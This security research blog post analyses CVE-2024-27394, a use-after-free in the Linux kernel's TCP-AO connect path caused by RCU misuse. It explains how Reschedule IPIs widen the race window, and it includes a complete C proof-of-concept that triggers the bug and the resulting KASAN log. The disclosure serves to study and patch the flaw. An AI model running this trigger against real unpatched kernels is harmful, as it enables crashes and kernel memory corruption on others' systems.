Deep Dive into RCU Race Condition: Analysis of TCP-AO UAF (CVE-2024-27394)
Introduction
This blog post presents an analysis of a Race Condition vulnerability caused by the incorrect use of an RCU API, along with a technique to reliably trigger it.
The vulnerability discussed here is a TCP-AO UAF, CVE-2024-27394, identified and patched by @V4bel of Theori. It was patched in April and has been backported to the Stable kernel.
Read-Copy-Update (RCU)
First, I’ll briefly explain Read-Copy-Update (RCU) and its related APIs. RCU is a bit more complicated to understand and use correctly than other synchronization methods, so I'll only cover Tree RCU, the variant relevant to this vulnerability (it corresponds to the CONFIG_TREE_RCU option). If you already know about RCU, you can skip this part.
RCU is a synchronization technique used in environments with a lot of read operations. While traditional locks (mutex, spin lock, etc.) block read operations during write operations, RCU minimizes overhead by allowing readers and writers to run concurrently.
RCU divides an Update into three stages: Removal, Grace Period, and Reclamation. First, the Removal stage removes the pointer so that subsequent readers can no longer reach the data structure. RCU then waits for all pre-existing readers to finish (the Grace Period), and finally the Reclamation stage destroys the data structure. RCU guarantees that no UAF occurs by ensuring the data structure is not kfree()-d while a reader is still reading it. The Grace Period is the period spent waiting for every reader that may have accessed the data structure to complete its work; it is essential because readers running concurrently on different CPUs could otherwise observe freed memory.
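These three stages map directly onto the update-side APIs that appear in the examples below. As a rough sketch (reusing the global_ptr, global_lock, and struct example from those examples; the function name here is hypothetical), an updater that blocks for the Grace Period itself rather than registering a callback would look like this:
void example_update_blocking(struct example *new)
{
        struct example *old;

        spin_lock(&global_lock);
        old = rcu_dereference_protected(global_ptr, lockdep_is_held(&global_lock));
        rcu_assign_pointer(global_ptr, new);    /* Removal: unpublish the old object */
        spin_unlock(&global_lock);

        synchronize_rcu();                      /* Grace Period: wait for all readers */

        kfree(old);                             /* Reclamation: now safe to free */
}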
Let’s dive deeper into the main RCU APIs with examples. First, a reader calls rcu_read_lock()/rcu_read_unlock() to delimit a Read-side Critical Section. And when dereferencing a pointer protected by RCU, we need to use an API like rcu_dereference(), which also acts as a memory barrier:
int example_reader(void)
{
        int val;

        rcu_read_lock();
        val = rcu_dereference(global_ptr)->a;
        rcu_read_unlock();

        return val;
}
Note that rcu_read_lock() calls preempt_disable() to prohibit preemption if CONFIG_PREEMPT_RCU is not set in the kernel. If CONFIG_PREEMPT_RCU is set, rcu_read_lock() instead increments current->rcu_read_lock_nesting by 1 without prohibiting preemption. The kernel used to trigger this vulnerability has CONFIG_PREEMPT_RCU enabled.
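The difference can be summarized with the following simplified sketch (this is not the actual kernel source; debugging hooks and memory barriers are omitted, and the function name is hypothetical):
#ifdef CONFIG_PREEMPT_RCU
static inline void sketch_rcu_read_lock(void)
{
        current->rcu_read_lock_nesting++;       /* reader stays preemptible */
}
#else
static inline void sketch_rcu_read_lock(void)
{
        preempt_disable();                      /* reader cannot be preempted */
}
#endif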
Next, updaters must not modify a data structure protected by RCU in place. Instead, they must allocate a new data structure, modify it, and then replace the old one using rcu_assign_pointer(). This replacement must be performed inside an Update-side Critical Section built with a traditional lock, such as a spin lock or mutex; otherwise a Race Condition can occur between the updaters:
void example_reclaim(struct rcu_head *head)
{
        struct example *old = container_of(head, struct example, rcu);

        kfree(old);
}

void example_updater(int a)
{
        struct example *new;
        struct example *old;

        new = kzalloc(sizeof(*new), GFP_KERNEL);

        spin_lock(&global_lock);
        old = rcu_dereference_protected(global_ptr, lockdep_is_held(&global_lock));
        new->a = a;
        rcu_assign_pointer(global_ptr, new);
        spin_unlock(&global_lock);

        call_rcu(&old->rcu, example_reclaim);
}
In the above code, call_rcu() registers a callback (example_reclaim) that is invoked once all Read-side Critical Sections have ended and the Grace Period is over. The registered reclaim callback is called in Soft IRQ context.
Now, example_reader() and example_updater() in the example above will not cause a Race Condition when executed simultaneously. The example_reader() function retrieves either the original object or the new copy from global_ptr. Even if it retrieves the original object, it is guaranteed that the original will only be kfree()-d after all Read-side Critical Sections have ended.
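As a side note, when the reclaim callback does nothing but kfree() the object, as example_reclaim() does, the updater can use kfree_rcu() and drop the explicit callback entirely. A minimal sketch (the function name is hypothetical):
void example_updater_kfree_rcu(int a)
{
        struct example *new;
        struct example *old;

        new = kzalloc(sizeof(*new), GFP_KERNEL);

        spin_lock(&global_lock);
        old = rcu_dereference_protected(global_ptr, lockdep_is_held(&global_lock));
        new->a = a;
        rcu_assign_pointer(global_ptr, new);
        spin_unlock(&global_lock);

        /* Queues 'old' to be kfree()-d after the Grace Period via its rcu_head. */
        kfree_rcu(old, rcu);
}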
Next, I will explain the RCU APIs related to lists. The function for adding a node to a list is list_add_rcu(), the macro for iterating over a list is list_for_each_entry_rcu, and the function for removing a node from a list is list_del_rcu(). Examples of using these APIs are as follows:
void example_add(int a)
{
        struct example *node;

        node = kzalloc(sizeof(*node), GFP_KERNEL);
        node->a = a;

        spin_lock(&global_lock);
        list_add_rcu(&node->list, &global_list);
        spin_unlock(&global_lock);
}

void example_iterate(void)
{
        struct example *node;

        rcu_read_lock();
        list_for_each_entry_rcu(node, &global_list, list) {
                pr_info("Value: %d\n", node->a);
        }
        rcu_read_unlock();
}

void example_del(void)
{
        struct example *node, *tmp;

        spin_lock(&global_lock);
        list_for_each_entry_safe(node, tmp, &global_list, list) {
                list_del_rcu(&node->list);
                call_rcu(&node->rcu, example_reclaim);
        }
        spin_unlock(&global_lock);
}
The three functions in the example will not cause a Race Condition when executed simultaneously. Note that list_add_rcu() is a write operation, so you must set up an Update-side Critical Section using a spin lock or similar. And list_for_each_entry_rcu must be used inside a Read-side Critical Section protected by rcu_read_lock().
Additionally, the hash linked list (hlist) has similar APIs: hlist_add_head_rcu(), hlist_for_each_entry_rcu, and hlist_del_rcu(). The usage and caveats are the same as for the list APIs.
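For completeness, here is a minimal sketch of the hlist variants, assuming the same global_lock as before and a hypothetical node type and list head (removal mirrors example_del(), but with hlist_del_rcu()):
struct example_hnode {
        int a;
        struct hlist_node node;
        struct rcu_head rcu;
};

static HLIST_HEAD(global_hlist);

void example_hlist_add(int a)
{
        struct example_hnode *n;

        n = kzalloc(sizeof(*n), GFP_KERNEL);
        n->a = a;

        spin_lock(&global_lock);                        /* update side */
        hlist_add_head_rcu(&n->node, &global_hlist);
        spin_unlock(&global_lock);
}

void example_hlist_iterate(void)
{
        struct example_hnode *n;

        rcu_read_lock();                                /* read side */
        hlist_for_each_entry_rcu(n, &global_hlist, node) {
                pr_info("Value: %d\n", n->a);
        }
        rcu_read_unlock();
}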
For more information on RCU, you can refer to the Kernel Doc.
ExpRace
Race condition vulnerabilities in the Linux kernel typically occur between two or more functions within the same subsystem, such as between ioctl() and write(), or between gc and sendmsg(). However, CVE-2024-27394 is a little different, because one of the two contexts involved in the race is the callback registered with call_rcu(), whose execution timing the user has no direct control over. Additionally, the race window is extremely narrow.
So I adopted a technique from the ExpRace paper, accepted at USENIX Security '21, to trigger this vulnerability.
This paper describes techniques that use indirect interrupt generation mechanisms to extend the race window and thereby increase exploit reliability. One of the techniques introduced in the paper utilizes the Reschedule Inter-Processor Interrupt (Reschedule IPI), an interrupt used to move tasks to specific processors or to distribute tasks evenly among the processors in a system. A Reschedule IPI can be generated by a user simply by calling the sched_setaffinity system call.
Now, let’s take a quick look at how to use this technique. First, here’s an example kernel module. In the example, example_open() is called when a user opens this device node via open().
static int example_open(struct inode *inode, struct file *file);

struct file_operations example_fops = {
        .open = example_open,
};

static struct miscdevice example_driver = {
        .minor = MISC_DYNAMIC_MINOR,
        .name = "example",
        .fops = &example_fops,
};

static int example_open(struct inode *inode, struct file *file)
{
        printk(KERN_INFO "Step 1");
        printk(KERN_INFO "Step 2");
        printk(KERN_INFO "Step 3");
        printk(KERN_INFO "Step 4");

        return 0;
}

static int example_init(void)
{
        int result;

        result = misc_register(&example_driver);
        if (result) {
                printk(KERN_INFO "misc_register(): Misc device register failed");
                return result;
        }

        return 0;
}

static void example_exit(void)
{
        misc_deregister(&example_driver);
}

module_init(example_init);
module_exit(example_exit);
What if you want to extend the execution gap between printk("Step 2") and printk("Step 3") in example_open()? It's simple: just call the sched_setaffinity syscall. (The following code is based on the skeleton code from the ExpRace paper.)
void pin_this_task_to(int cpu)
{
        cpu_set_t cset;

        CPU_ZERO(&cset);
        CPU_SET(cpu, &cset);

        // if pid is NULL then calling thread is used
        if (sched_setaffinity(0, sizeof(cpu_set_t), &cset))
                err(1, "affinity");
}

void target_thread(void *arg)
{
        int fd;

        // Suppose that a victim thread is running on core 2.
        pin_this_task_to(2);

        while (1) {
                fd = open("/dev/example", O_RDWR);
        }
}
int main()
{
        pthread_t thr;

        pthread_create(&thr, NULL, target_thread, NULL);

        // Send rescheduling IPI to core 2 to extend the race window.
        pin_this_task_to(2);
        ...
1. Create a thread, target_thread, which calls pin_this_task_to(2) to pin itself to CPU #2 and then repeatedly calls open() on the example module. As a result, the example_open() function will be executed on CPU #2.
2. Call pin_this_task_to(2) in the parent thread. If a Reschedule IPI is received by CPU #2 just after printk("Step 2") returns in the target_thread thread, the interrupt will migrate the parent thread onto CPU #2, so the target_thread thread will stall between printk("Step 2") and printk("Step 3").
3. After execution returns to the target_thread thread, the remaining printk("Step 3") and printk("Step 4") are called.
Now, if you run this code and check the kernel logs, you’ll see that the execution time between Step 1 and Step 2 is only 7 μs, while the execution time between Step 2 and Step 3 is over 200,000 μs. This is because the task was forcibly preempted by the Reschedule IPI sent by the user right after Step 2.
$ ./ipi_test
[ 2.906480] Step 1
[ 2.906487] Step 2 // 7 μs
[ 3.107129] Step 3 // 200642 μs
[ 3.107737] Step 4 // 608 μs
In other words, by applying this technique, we can create a time gap longer than the RCU Grace Period by preempting a task at a specific point.
Of course, since the user cannot control the exact preemption timing, the attempt must be repeated until the task is preempted at the desired point.
CVE-2024-27394: TCP Authentication Option Use-After-Free
The TCP Authentication Option (TCP-AO) is a TCP option designed to enhance the security of TCP connections. It replaces the older TCP MD5 Signature Option and serves to authenticate peers and verify data integrity over TCP connections.
CVE-2024-27394 occurs in the tcp_ao_connect_init() function in net/ipv4/tcp_ao.c. This function is invoked when a user calls connect() on an IPv4-based TCP socket, with the following call stack:
connect()
=> __sys_connect()
=> __sys_connect_file()
=> inet_stream_connect()
=> __inet_stream_connect()
=> tcp_v4_connect()
=> tcp_connect()
=> tcp_connect_init()
=> tcp_ao_connect_init()
Thus, it is called during the connection preparation process, regardless of whether the peer connection succeeds.
The tcp_ao_connect_init() function iterates over entries using hlist_for_each_entry_rcu, freeing the keys that do not match the peer. Although the use of call_rcu() looks safe, there is an issue: tcp_ao_connect_init() is not within an RCU Read-side Critical Section.
void tcp_ao_connect_init(struct sock *sk)
{
        struct tcp_sock *tp = tcp_sk(sk);
        struct tcp_ao_info *ao_info;
        union tcp_ao_addr *addr;
        struct tcp_ao_key *key;
        int family, l3index;

        ao_info = rcu_dereference_protected(tp->ao_info,
                                            lockdep_sock_is_held(sk));
        if (!ao_info)
                return;

        /* Remove all keys that don't match the peer */
        family = sk->sk_family;
        if (family == AF_INET)
                addr = (union tcp_ao_addr *)&sk->sk_daddr;
#if IS_ENABLED(CONFIG_IPV6)
        else if (family == AF_INET6)
                addr = (union tcp_ao_addr *)&sk->sk_v6_daddr;
#endif
        else
                return;

        l3index = l3mdev_master_ifindex_by_index(sock_net(sk),
                                                 sk->sk_bound_dev_if);

        hlist_for_each_entry_rcu(key, &ao_info->head, node) { // <==[2]
                if (!tcp_ao_key_cmp(key, l3index, addr, key->prefixlen, family, -1, -1))
                        continue;

                if (key == ao_info->current_key)
                        ao_info->current_key = NULL;
                if (key == ao_info->rnext_key)
                        ao_info->rnext_key = NULL;
                hlist_del_rcu(&key->node);
                atomic_sub(tcp_ao_sizeof_key(key), &sk->sk_omem_alloc);
                call_rcu(&key->rcu, tcp_ao_key_free_rcu); // <==[1]
        }
If the RCU Grace Period ends right after call_rcu() completes [1], tcp_ao_key_free_rcu() is invoked and frees the key. If, during the iteration, the next node of the already-freed key is then accessed, a Use-After-Free occurs.
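To see why, note that each step of hlist_for_each_entry_rcu advances by reading the next pointer stored in the current entry. Roughly (a simplified expansion of the macro; the real definition in include/linux/rculist.h differs in details), the loop in tcp_ao_connect_init() behaves like this:
for (key = hlist_entry_safe(rcu_dereference(hlist_first_rcu(&ao_info->head)),
                            struct tcp_ao_key, node);
     key;
     key = hlist_entry_safe(rcu_dereference(hlist_next_rcu(&key->node)),
                            struct tcp_ao_key, node)) {
        /*
         * ... loop body: hlist_del_rcu(&key->node), call_rcu(), etc. ...
         *
         * The advance expression above reads key->node.next. If the task was
         * preempted right after call_rcu() and the Grace Period ended in the
         * meantime, 'key' has already been kfree()-d by tcp_ao_key_free_rcu(),
         * so this read touches freed memory.
         */
}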
This ao_info and key [2] can be allocated by calling setsockopt() with the TCP_AO_ADD_KEY command as an argument:
int tcp_parse_ao(struct sock *sk, int cmd, unsigned short int family,
                 sockptr_t optval, int optlen)
{
        if (WARN_ON_ONCE(family != AF_INET && family != AF_INET6))
                return -EAFNOSUPPORT;

        switch (cmd) {
        case TCP_AO_ADD_KEY:
                return tcp_ao_add_cmd(sk, family, optval, optlen); // <==[3]
        case TCP_AO_DEL_KEY:
                return tcp_ao_del_cmd(sk, family, optval, optlen);
        case TCP_AO_INFO:
                return tcp_ao_info_cmd(sk, family, optval, optlen);
        default:
                WARN_ON_ONCE(1);
                return -EINVAL;
        }
}
When setsockopt() is called with TCP_AO_ADD_KEY as an argument, tcp_ao_add_cmd() is triggered [3]. If this command is used for the first time on a TCP socket, ao_info is allocated and stored in tcp_sk(sk)->ao_info [4].
static int tcp_ao_add_cmd(struct sock *sk, unsigned short int family,
                          sockptr_t optval, int optlen)
{
        ...
        ao_info = setsockopt_ao_info(sk);
        if (IS_ERR(ao_info))
                return PTR_ERR(ao_info);

        if (!ao_info) {
                ao_info = tcp_ao_alloc_info(GFP_KERNEL);
                if (!ao_info)
                        return -ENOMEM;
                first = true;
        } else {
        ...
        if (first) {
                if (!static_branch_inc(&tcp_ao_needed.key)) {
                        ret = -EUSERS;
                        goto err_free_sock;
                }
                sk_gso_disable(sk);
                rcu_assign_pointer(tcp_sk(sk)->ao_info, ao_info); // <==[4]
        }
This means that each TCP socket has its own ao_info. In the same flow, a key is allocated and then linked with the ao_info [5]:
static int tcp_ao_add_cmd(struct sock *sk, unsigned short int family,
                          sockptr_t optval, int optlen)
{
        ...
        key = tcp_ao_key_alloc(sk, &cmd);
        if (IS_ERR(key)) {
                ret = PTR_ERR(key);
                goto err_free_ao;
        }

        INIT_HLIST_NODE(&key->node);
        memcpy(&key->addr, addr, (family == AF_INET) ? sizeof(struct in_addr) :
                                  sizeof(struct in6_addr));
        key->prefixlen = cmd.prefix;
        key->family = family;
        key->keyflags = cmd.keyflags;
        key->sndid = cmd.sndid;
        key->rcvid = cmd.rcvid;
        key->l3index = l3index;
        atomic64_set(&key->pkt_good, 0);
        atomic64_set(&key->pkt_bad, 0);

        ret = tcp_ao_parse_crypto(&cmd, key);
        if (ret < 0)
                goto err_free_sock;

        if (!((1 << sk->sk_state) & (TCPF_LISTEN | TCPF_CLOSE))) {
                tcp_ao_cache_traffic_keys(sk, ao_info, key);
                if (first) {
                        ao_info->current_key = key;
                        ao_info->rnext_key = key;
                }
        }

        tcp_ao_link_mkt(ao_info, key); // <==[5]
In the tcp_ao_add_cmd() function, a new key is allocated and initialized. The key contains user-specified values such as sndid and rcvid, as well as the security key string, and is then linked to ao_info->head.
This sets the stage for reaching the vulnerable hlist_for_each_entry_rcu in the tcp_ao_connect_init() function. To trigger the vulnerability, the RCU Grace Period must end immediately after call_rcu() is called, which invokes the tcp_ao_key_free_rcu() callback and frees the key while the iteration is still in progress.
However, conditions where the RCU Grace Period naturally ends right after call_rcu() are rare. Therefore, the Reschedule IPI technique is used to reliably create this scenario. The trigger scenario is as follows:
cpu0                                          cpu1
setsockopt(A, TCP_AO_ADD_KEY)
  key = tcp_ao_key_alloc() // key alloc
sched_setaffinity(0)
connect(A)
  tcp_ao_connect_init(A)
    hlist_for_each_entry_rcu {
      call_rcu(key)
                                              sched_setaffinity(0)
                                              [ Send Reschedule IPI to cpu0 ]
[ connect(A) is preempted ]
                                              connect(B)
                                              ...
[ End of RCU Grace Period ]
__do_softirq(A)
  rcu_core(A)
    tcp_ao_key_free_rcu(A)
      kfree(key) // key freed
[ Returning to connect(A) ]
    hlist_for_each_entry_rcu {
      key->next // UAF
1. setsockopt(TCP_AO_ADD_KEY) is called to allocate ao_info and keys for the TCP socket, with at least two keys allocated.
2. The process is then pinned to CPU #0 and connect() is called, leading to tcp_ao_connect_init(), where call_rcu() is executed.
3. After this, another process calls sched_setaffinity(0) to send a Reschedule IPI to CPU #0, causing the process running tcp_ao_connect_init() to be preempted right after call_rcu() returns.
4. The RCU Grace Period ends, triggering the tcp_ao_key_free_rcu() callback registered by call_rcu(), which then kfree()s the key.
5. When the preempted process resumes and returns to tcp_ao_connect_init(), it accesses the already kfree()-d key via hlist_for_each_entry_rcu, leading to a Use-After-Free.
To increase the likelihood of preempting tcp_ao_connect_init() at the right moment during the iteration of hlist_for_each_entry_rcu, multiple keys should be linked during the setup phase. However, there is a limit on the number of keys that can be linked, because sndid and rcvid must be unique. Since these fields are of u8 type, only 256 unique keys can be linked to one ao_info.
static int tcp_ao_add_cmd(struct sock *sk, unsigned short int family,
                          sockptr_t optval, int optlen)
{
        ...
        ao_info = setsockopt_ao_info(sk);
        if (IS_ERR(ao_info))
                return PTR_ERR(ao_info);

        if (!ao_info) {
                ao_info = tcp_ao_alloc_info(GFP_KERNEL);
                if (!ao_info)
                        return -ENOMEM;
                first = true;
        } else { // <==[6]
                /* Check that neither RecvID nor SendID match any
                 * existing key for the peer, RFC5925 3.1:
                 * > The IDs of MKTs MUST NOT overlap where their
                 * > TCP connection identifiers overlap.
                 */
                if (__tcp_ao_do_lookup(sk, l3index, addr, family, cmd.prefix, -1, cmd.rcvid))
                        return -EEXIST;
                if (__tcp_ao_do_lookup(sk, l3index, addr, family,
                                       cmd.prefix, cmd.sndid, -1))
                        return -EEXIST;
        }
In the tcp_ao_add_cmd() function, if ao_info has already been allocated, the sndid and rcvid of the existing keys are checked [6]. Should the sndid or rcvid values provided by the user in a key allocation request overlap with any existing values, the allocation is rejected. Therefore, the number of keys that can be linked is limited by the range of the sndid and rcvid members, which are u8 types and can only hold values from 0 to 255. This means that only 256 keys can be linked to a single ao_info:
struct tcp_ao_key {
        ...
        u8 sndid;
        u8 rcvid;
        ...
};
The following is Proof-of-Concept (PoC) code that triggers the vulnerability:
#define _GNU_SOURCE
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <time.h>
#include <signal.h>
#include <pthread.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <linux/types.h>
#include <linux/socket.h>
#define PORT 8080
#define TCP_AO_ADD_KEY 38
#define TCP_AO_MAXKEYLEN 80
#define DEFAULT_TEST_PASSWORD "In this hour, I do not believe that any darkness will endure."
#define DEFAULT_TEST_ALGO "cmac(aes128)"
#define TCP_AO_KEYF_IFINDEX (1 << 0)
#define KEY_COUNT 255
#define SOCK_COUNT 200
#define LOOP_COUNT 5
struct tcp_ao_add { /* setsockopt(TCP_AO_ADD_KEY) */
        struct __kernel_sockaddr_storage addr;  /* peer's address for the key */
        char alg_name[64];      /* crypto hash algorithm to use */
        __s32 ifindex;          /* L3 dev index for VRF */
        __u32 set_current :1,   /* set key as Current_key at once */
              set_rnext   :1,   /* request it from peer with RNext_key */
              reserved    :30;  /* must be 0 */
        __u16 reserved2;        /* padding, must be 0 */
        __u8 prefix;            /* peer's address prefix */
        __u8 sndid;             /* SendID for outgoing segments */
        __u8 rcvid;             /* RecvID to match for incoming seg */
        __u8 maclen;            /* length of authentication code (hash) */
        __u8 keyflags;          /* see TCP_AO_KEYF_ */
        __u8 keylen;            /* length of ::key */
        __u8 key[TCP_AO_MAXKEYLEN];
} __attribute__((aligned(8)));
struct sockaddr_in serv_addr;

void pin_this_task_to(int cpu)
{
        cpu_set_t cset;

        CPU_ZERO(&cset);
        CPU_SET(cpu, &cset);

        if (sched_setaffinity(0, sizeof(cpu_set_t), &cset))
                perror("affinity");
}

int random_val(int a, int b)
{
        int random_value;

        srand(time(NULL));
        random_value = rand() % (b - a + 1) + a;

        return random_value;
}

void ao_add_key(int sock, __u8 prefix, __u8 sndid, __u8 rcvid, __u32 saddr)
{
        struct tcp_ao_add *ao;
        struct sockaddr_in addr = {};

        ao = (struct tcp_ao_add *)malloc(sizeof(*ao));
        memset(ao, 0, sizeof(*ao));

        ao->set_current = !!0;
        ao->set_rnext = !!0;
        ao->prefix = prefix;
        ao->sndid = sndid;
        ao->rcvid = rcvid;
        ao->maclen = 0;
        ao->keyflags = 0;
        ao->keylen = 16;
        ao->ifindex = 0;

        addr.sin_family = AF_INET;
        addr.sin_port = 0;
        addr.sin_addr.s_addr = saddr;

        strncpy(ao->alg_name, DEFAULT_TEST_ALGO, 64);
        memcpy(&ao->addr, &addr, sizeof(struct sockaddr_in));
        memcpy(ao->key, "1234567890123456", 16);

        if (setsockopt(sock, IPPROTO_TCP, TCP_AO_ADD_KEY, ao, sizeof(*ao)) < 0) {
                perror("setsockopt TCP_AO_ADD_KEY failed");
                close(sock);
                exit(EXIT_FAILURE);
        }

        free(ao);
}
void add_key(int sock)
{
        ao_add_key(sock, 0, 0, 0, 0);
        for (int i = 1; i < KEY_COUNT; i++) {
                ao_add_key(sock, 31, 0 + i, 0 + i, 0x00010101);
        }
}

void ao_connect(int socks[])
{
        pid_t pid;

        for (int i = 0; i < SOCK_COUNT; i++) {
                pid = fork();
                if (pid == 0) {
                        pin_this_task_to(0);
                        if (connect(socks[i], (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0) {
                                printf("\nConnection Failed \n");
                                exit(EXIT_FAILURE);
                        }
                } else {
                        usleep(random_val(50000, 100000));
                        kill(pid, SIGKILL);
                        wait(NULL);
                }
        }
}

int main()
{
        pid_t pid;

        serv_addr.sin_family = AF_INET;
        serv_addr.sin_port = htons(PORT);

        if (inet_pton(AF_INET, "127.0.0.1", &serv_addr.sin_addr) <= 0) {
                printf("\nInvalid address/ Address not supported \n");
                exit(EXIT_FAILURE);
        }

        while (1) {
                pid = fork();
                if (pid == 0) {
                        int socks[LOOP_COUNT][SOCK_COUNT];
                        pthread_t thr[LOOP_COUNT];

                        for (int i = 0; i < LOOP_COUNT; i++) {
                                for (int j = 0; j < SOCK_COUNT; j++) {
                                        if ((socks[i][j] = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
                                                printf("\n Socket creation error \n");
                                                exit(EXIT_FAILURE);
                                        }
                                        add_key(socks[i][j]);
                                }
                        }

                        for (int i = 0; i < LOOP_COUNT; i++)
                                pthread_create(&thr[i], NULL, ao_connect, socks[i]);

                        sleep(15);
                        exit(0);
                } else {
                        int status;

                        waitpid(pid, &status, 0);
                        sleep(0.1);
                }
        }

        return 0;
}
Here is a step-by-step explanation of the PoC code. First, 1,000 TCP sockets are created, and add_key() is called on each socket to allocate its ao_info and link 256 keys. This avoids unnecessary allocation work during the later preemption.
#define KEY_COUNT 255
#define SOCK_COUNT 200
#define LOOP_COUNT 5

void add_key(int sock)
{
        ao_add_key(sock, 0, 0, 0, 0);
        for (int i = 1; i < KEY_COUNT; i++) {
                ao_add_key(sock, 31, 0 + i, 0 + i, 0x00010101);
        }
}

int main()
{
        ...
        while (1) {
                pid = fork();
                if (pid == 0) {
                        int socks[LOOP_COUNT][SOCK_COUNT];
                        pthread_t thr[LOOP_COUNT];

                        for (int i = 0; i < LOOP_COUNT; i++) {
                                for (int j = 0; j < SOCK_COUNT; j++) {
                                        if ((socks[i][j] = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
                                                printf("\n Socket creation error \n");
                                                exit(EXIT_FAILURE);
                                        }
                                        add_key(socks[i][j]);
                                }
                        }
Next, five ao_connect threads are created and executed. Each ao_connect thread first calls pin_this_task_to(0) to pin its subsequent operations to CPU #0. It then calls connect() on TCP sockets that had keys linked during the preparation phase, triggering tcp_ao_connect_init(). The reason for dividing the 1,000 sockets among five threads is that, whenever they call pin_this_task_to(0), the five ao_connect threads continuously send Reschedule IPIs to each other and preempt one another inside the traversal of hlist_for_each_entry_rcu.
#define KEY_COUNT 255
#define SOCK_COUNT 200
#define LOOP_COUNT 5

void pin_this_task_to(int cpu)
{
        cpu_set_t cset;

        CPU_ZERO(&cset);
        CPU_SET(cpu, &cset);

        if (sched_setaffinity(0, sizeof(cpu_set_t), &cset))
                perror("affinity");
}

void ao_connect(int socks[])
{
        pid_t pid;

        for (int i = 0; i < SOCK_COUNT; i++) {
                pid = fork();
                if (pid == 0) {
                        pin_this_task_to(0);
                        if (connect(socks[i], (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0) {
                                printf("\nConnection Failed \n");
                                exit(EXIT_FAILURE);
                        }
                } else {
                        usleep(random_val(50000, 100000));
                        kill(pid, SIGKILL);
                        wait(NULL);
                }
        }
}

int main()
{
        ...
        for (int i = 0; i < LOOP_COUNT; i++)
                pthread_create(&thr[i], NULL, ao_connect, socks[i]);
Now, by running the PoC code on a kernel with KASAN and CONFIG_PREEMPT=y enabled, you can obtain the following KASAN log.
[ 355.599161] ==================================================================
[ 355.599841] BUG: KASAN: slab-use-after-free in tcp_ao_connect_init+0x66d/0x7e0
[ 355.600479] Read of size 8 at addr ffff88810a3d0400 by task poc/17851
[ 355.601113]
[ 355.601257] CPU: 0 PID: 17851 Comm: poc Not tainted 6.8.4 #17
[ 355.601829] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
[ 355.602557] Call Trace:
[ 355.602778]
[ 355.602972] dump_stack_lvl+0x44/0x60
[ 355.603300] print_report+0xc2/0x610
[ 355.604404] kasan_report+0xac/0xe0
[ 355.605029] tcp_ao_connect_init+0x66d/0x7e0
[ 355.605827] tcp_connect+0x2df/0x5230
[ 355.607237] tcp_v4_connect+0x10d5/0x1860
[ 355.607744] __inet_stream_connect+0x389/0xe80
[ 355.609741] inet_stream_connect+0x53/0xa0
[ 355.609989] __sys_connect+0x101/0x130
[ 355.611054] __x64_sys_connect+0x6e/0xb0
[ 355.611533] do_syscall_64+0x7e/0x120
[ 355.613167] entry_SYSCALL_64_after_hwframe+0x73/0x7b
[ 355.613474] RIP: 0033:0x4557cb
[ 355.613664] Code: 83 ec 18 89 54 24 0c 48 89 34 24 89 7c 24 08 e8 ab 8c 02 00 8b 54 24 0c 48 8b 34 24 41 89 c0 8b 7c 24 08 b8 2a 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 35 44 89 c7 89 44 24 08 e8 f1 8c 02 00 8b 44
[ 355.614784] RSP: 002b:00007d73c9e001a0 EFLAGS: 00000293 ORIG_RAX: 000000000000002a
[ 355.615237] RAX: ffffffffffffffda RBX: 00007d73c9e00640 RCX: 00000000004557cb
[ 355.615673] RDX: 0000000000000010 RSI: 00000000004e6380 RDI: 0000000000000096
[ 355.616106] RBP: 00007d73c9e001d0 R08: 0000000000000000 R09: 00007d73c9e00640
[ 355.616539] R10: 00007d73c9e00910 R11: 0000000000000293 R12: 00007d73c9e00640
[ 355.616970] R13: 0000000000000000 R14: 0000000000416320 R15: 00007d73c9600000
[ 355.617409]
[ 355.617547]
[ 355.617644] Allocated by task 17110:
[ 355.617865] kasan_save_stack+0x20/0x40
[ 355.618104] kasan_save_track+0x10/0x30
[ 355.618340] __kasan_kmalloc+0x7b/0x90
[ 355.618574] __kmalloc+0x207/0x4e0
[ 355.618787] sock_kmalloc+0xdf/0x130
[ 355.619008] tcp_ao_add_cmd+0xa59/0x1d60
[ 355.619250] do_tcp_setsockopt+0xb19/0x2f60
[ 355.619509] do_sock_setsockopt+0x1e5/0x3f0
[ 355.619766] __sys_setsockopt+0x101/0x1a0
[ 355.620011] __x64_sys_setsockopt+0xb9/0x150
[ 355.620274] do_syscall_64+0x7e/0x120
[ 355.620503] entry_SYSCALL_64_after_hwframe+0x73/0x7b
[ 355.620812]
[ 355.620909] Freed by task 17853:
[ 355.621109] kasan_save_stack+0x20/0x40
[ 355.621349] kasan_save_track+0x10/0x30
[ 355.621586] kasan_save_free_info+0x37/0x60
[ 355.621842] __kasan_slab_free+0x102/0x190
[ 355.622093] kfree+0xd8/0x2c0
[ 355.622282] rcu_core+0xb2c/0x15b0
[ 355.622491] __do_softirq+0x1c7/0x612
[ 355.622717]
[ 355.622814] Last potentially related work creation:
[ 355.623116] kasan_save_stack+0x20/0x40
[ 355.623351] __kasan_record_aux_stack+0x8e/0xa0
[ 355.623633] __call_rcu_common.constprop.0+0x6f/0x730
[ 355.623946] tcp_ao_connect_init+0x325/0x7e0
[ 355.624194] tcp_connect+0x2df/0x5230
[ 355.624415] tcp_v4_connect+0x10d5/0x1860
[ 355.624659] __inet_stream_connect+0x389/0xe80
[ 355.624934] inet_stream_connect+0x53/0xa0
[ 355.625192] __sys_connect+0x101/0x130
[ 355.625429] __x64_sys_connect+0x6e/0xb0
[ 355.625669] do_syscall_64+0x7e/0x120
[ 355.625894] entry_SYSCALL_64_after_hwframe+0x73/0x7b
[ 355.626209]
[ 355.626309] The buggy address belongs to the object at ffff88810a3d0400
[ 355.626309] which belongs to the cache kmalloc-256 of size 256
[ 355.627059] The buggy address is located 0 bytes inside of
[ 355.627059] freed 256-byte region [ffff88810a3d0400, ffff88810a3d0500)
[ 355.627788]
[ 355.627889] The buggy address belongs to the physical page:
[ 355.628229] page:00000000cc00e344 refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x10a3d0
[ 355.628797] head:00000000cc00e344 order:1 entire_mapcount:0 nr_pages_mapped:0 pincount:0
